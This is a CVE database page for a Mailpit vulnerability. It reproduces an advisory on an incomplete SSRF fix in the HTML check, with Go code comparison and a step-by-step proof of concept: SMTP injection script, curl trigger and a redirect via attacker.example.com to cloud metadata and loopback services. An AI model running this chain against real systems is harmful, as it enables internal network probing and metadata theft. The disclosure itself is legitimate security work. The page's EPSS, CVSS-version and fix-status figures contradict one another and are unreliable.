CVE-2026-45709

MEDIUMPre-NVD 5.85.8
EchelonGraph scoreLOW confidence

This medium-severity CVE scores 5.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 89% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
5.8
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: 0%CVSS: 5.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Mailpit has an incomplete fix for GHSA-6jxm: HTML check still permits SSRF to private/loopback/IMDS via missing IP-filter dialer

Summary

The fix for GHSA-6jxm-fv7w-rw5j (CVE-2026-23845, "Server-Side Request Forgery (SSRF) via HTML Check API"), shipped in mailpit v1.28.3, hardened internal/htmlcheck/css.go::downloadCSSToBytes with a 5MB size cap, a text/css content-type check, login-info stripping in isValidURL, and an opt-in --block-remote-css-and-fonts config flag — but did not add the IP-filtering dialer that the same codebase already uses on the two sister SSRF endpoints (the proxy handler and link-check). At HEAD 8bc966e61834a24c48b4465da418f75e73be0afd (2026-05-06), internal/htmlcheck/css.go::newSafeHTTPClient is mis-named — it builds an http.Client whose Transport.DialContext calls net.Dialer.DialContext directly with no IP allowlisting. As a result, the SSRF originally reported by Bao Anh Phan still permits the server to dial:

  • loopback (127.0.0.0/8, ::1),
  • private (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, fc00::/7),
  • link-local incl. cloud IMDS (169.254.0.0/16, especially 169.254.169.254),
  • CGNAT (100.64.0.0/10),
  • and any other reserved/multicast range,

— provided the target replies with HTTP/200 and a content-type beginning with text/css. With redirect-following (CheckRedirect allows redirects to any isValidURL URL with no IP filter), an attacker-controlled public site can redirect mailpit's request into the private network without ever appearing in the email's HTML.

In the default mailpit deploy (no UI auth, no SMTP auth, port 1025/8025 exposed), this is an unauthenticated, network-reachable SSRF triggered by sending an HTML email and then issuing one HTTP GET to /api/v1/message/{id}/html-check.

Affected versions

  • internal/htmlcheck/css.go at HEAD 8bc966e61834a24c48b4465da418f75e73be0afd (2026-05-06).
  • All versions >= v1.28.3 (the version that shipped the GHSA-6jxm fix). Versions <= v1.28.2 are vulnerable to the original GHSA-6jxm; versions >= v1.28.3 carry the still-vulnerable variant described here.

The incomplete fix

The original GHSA-6jxm fix added size+content-type+login-info hardening to downloadCSSToBytes. But the dialer it uses still has no safeDialContext. The companion linkcheck and proxy handlers in the same codebase have all-three protections: size cap, content-type/redirect filter, AND a safeDialContext that runs tools.IsInternalIP(ip.IP) per resolved address — same pattern the htmlcheck dialer should adopt.

Side-by-side at HEAD 8bc966e:

| File | Function | safeDialContext (IP filter)? | TOCTOU-safe (dial-by-IP)? | |---|---|---|---| | internal/linkcheck/status.go::safeDialContext line 140-163 | dial check | YES | YES (resolved IP joined with port) | | server/handlers/proxy.go::safeDialContext line 393-415 | dial check | YES | YES | | internal/htmlcheck/css.go::newSafeHTTPClient line 275-310 | dial check | NO | n/a |

The mis-named newSafeHTTPClient reads:

// internal/htmlcheck/css.go:275-310
func newSafeHTTPClient() *http.Client {
    dialer := &net.Dialer{
        Timeout:   5 * time.Second,
        KeepAlive: 30 * time.Second,
    }

tr := &http.Transport{ Proxy: nil, DialContext: func(ctx context.Context, network, address string) (net.Conn, error) { return dialer.DialContext(ctx, network, address) // no IP filter }, ... }

client := &http.Client{ Transport: tr, Timeout: 15 * time.Second, CheckRedirect: func(req *http.Request, via []*http.Request) error { if len(via) >= 3 { return errors.New("too many redirects") } if !isValidURL(req.URL.String()) { return errors.New("invalid redirect URL") } return nil }, } return client }

isValidURL only rejects non-http(s) and userinfo URLs — it does NOT reject internal IPs. Compare linkcheck/status.go::safeDialContext:

ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
...
if !config.AllowInternalHTTPRequests {
    for _, ip := range ips {
        if tools.IsInternalIP(ip.IP) {
            return nil, fmt.Errorf("blocked request to %s (%s): private/reserved address", host, ip)
        }
    }
}
return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))

That's the protection htmlcheck is missing.

Reachability chain (default deploy)

Listen()                                 # config/config.go:36 SMTPListen = "[::]:1025"
   ↓
SMTP server                              # internal/smtpd/main.go:222-249  AuthRequired: false, AuthHandler: nil
   ↓ attacker injects HTML body with 
   ↓
storage.Store(...)
   ↓
Listen()                                 # server/server.go HTTPListen
   ↓ attacker sends GET /api/v1/message/{id}/html-check
apiv1.HTMLCheck                          # server/apiv1/other.go:18
   ↓ no UI auth in default deploy (auth.UICredentials == nil)
htmlcheck.RunTests(msg.HTML)             # internal/htmlcheck/main.go:17
   ↓
runCSSTests → inlineRemoteCSS            # internal/htmlcheck/css.go:25, 132
   ↓
downloadCSSToBytes(href)                 # internal/htmlcheck/css.go:192
   ↓
newSafeHTTPClient()                      # internal/htmlcheck/css.go:275
   ↓ no IP filter on Transport.DialContext or CheckRedirect
client.Do(req) → attacker-controlled origin → 302 redirect to internal IP → success

PoC

Default-deploy reproduction (no auth):

# 1) start mailpit with defaults (no --smtp-auth, no --ui-auth)
docker run -p 1025:1025 -p 8025:8025 axllent/mailpit:latest

2) attacker hosts a redirect to an internal target

e.g., http://attacker.example.com/test.css → 302 → http://169.254.169.254/...

3) inject email via SMTP (no auth required)

python3 - <<'EOF' import smtplib from email.mime.text import MIMEText html = '''<!DOCTYPE html> x''' m = MIMEText(html, 'html') m['Subject'] = 'mailpit-001' m['From'] = 'a@b' m['To'] = 'c@d' with smtplib.SMTP('localhost', 1025) as s: s.send_message(m) EOF

4) get the message ID

ID=$(curl -s http://localhost:8025/api/v1/messages?limit=1 | jq -r '.messages[0].ID')

5) trigger the SSRF with one anonymous GET

curl -i http://localhost:8025/api/v1/message/$ID/html-check

The HTTP server-side dial follows http://attacker.example.com/test.css → 302 redirect to http://127.0.0.1:6379/ → mailpit completes a TCP connect to the loopback Redis. No request body is reflected to the attacker (mailpit only inlines successful 200 + text/css responses), but:

  • State-changing internal GETs. Any internal admin app served on 127.0.0.1 or RFC1918 with a "GET /admin/restart", "GET /vacuum", "GET /flush" pattern can be triggered through this primitive. Several common stacks (Spring Actuator, etcd debug, internal Prometheus admin, Redis HTTP front-ends, Jaeger UI) expose such operations on private ports.
  • Cloud-IMDS reachability oracle. Because IMDS responses don't carry text/css, the body is not inlined — but the redirect chain DOES dial 169.254.169.254. A side-channel (response time, DNS log) can confirm IMDS reachability from a default-deploy mailpit on cloud.
  • Internal port-scan via timing. The 5s+15s timeouts produce a clear timing differential between "RST refused" (~ms), "open and HTTP-noisy" (~10ms+), and "filtered" (multi-second).
  • Authenticated Mailpit/ GET. Every internal target sees a known UA from a trusted internal subnet; combined with redirect-stripping, this can fool internal allowlists keyed on UA.

Threat model alignment

The maintainer's prior position on the SSRF class is captured by GHSA-6jxm-fv7w-rw5j (HTML Check, Medium), GHSA-mpf7-p9x7-96r3 (Link Check, Medium), and GHSA-8v65-47jx-7mfr (

CVSS v3
5.8
EG Score
5.8(low)
EPSS
11.4%
KEV
Not listed

Published

May 19, 2026

Last Modified

May 19, 2026

Vendor Advisories for CVE-2026-45709(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Go(1)
PackageVulnerable rangeFixed inDependents
github.com/axllent/mailpit1.30.0

Data Freshness Timeline

(refreshed 0× in last 7d / 6× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-06-29 20:54 UTCEG score recompute
  2. 2026-06-27 20:25 UTCEG score recompute
  3. 2026-06-26 19:48 UTCEG score recompute
  4. 2026-06-25 17:06 UTCEG score recompute
  5. 2026-06-17 20:07 UTCEG score recompute
  6. 2026-06-16 20:57 UTCEG score recompute
  7. 2026-06-15 23:02 UTCEG score recompute
  8. 2026-06-14 23:18 UTCEPSS rescore
  9. 2026-06-14 20:28 UTCEG score recompute
  10. 2026-06-13 23:00 UTCEPSS rescore
  11. 2026-06-13 22:41 UTCEG score recompute
  12. 2026-06-13 00:36 UTCEG score recompute
  13. 2026-06-12 23:12 UTCEPSS rescore
  14. 2026-06-12 02:49 UTCEG score recompute
  15. 2026-06-11 05:03 UTCEG score recompute
  16. 2026-06-10 07:16 UTCEG score recompute
  17. 2026-06-09 09:19 UTCEG score recompute
  18. 2026-06-08 11:31 UTCEG score recompute
  19. 2026-06-07 13:45 UTCEG score recompute
  20. 2026-06-06 15:58 UTCEG score recompute
  21. 2026-06-05 18:11 UTCEG score recompute
  22. 2026-06-04 20:24 UTCEG score recompute
  23. 2026-06-03 22:37 UTCEG score recompute
  24. 2026-06-03 00:50 UTCEG score recompute
  25. 2026-06-02 02:48 UTCEG score recompute
Show 2 more
  1. 2026-06-01 05:01 UTCEG score recompute
  2. 2026-05-24 06:14 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-45709?
CVE-2026-45709 is a medium vulnerability published on May 19, 2026. Mailpit has an incomplete fix for GHSA-6jxm: HTML check still permits SSRF to private/loopback/IMDS via missing IP-filter dialer Summary The fix for GHSA-6jxm-fv7w-rw5j (CVE-2026-23845, "Server-Side Request Forgery (SSRF) via HTML Check API"), shipped in mailpit v1.28.3, hardened…
When was CVE-2026-45709 disclosed?
CVE-2026-45709 was first published in the National Vulnerability Database on May 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-45709 actively exploited?
CVE-2026-45709 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 11.4% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-45709?
CVE-2026-45709 has a CVSS v4.0 base score of 5.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-45709?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-45709, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-45709

Explore →

Is Your Infrastructure Affected by CVE-2026-45709?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.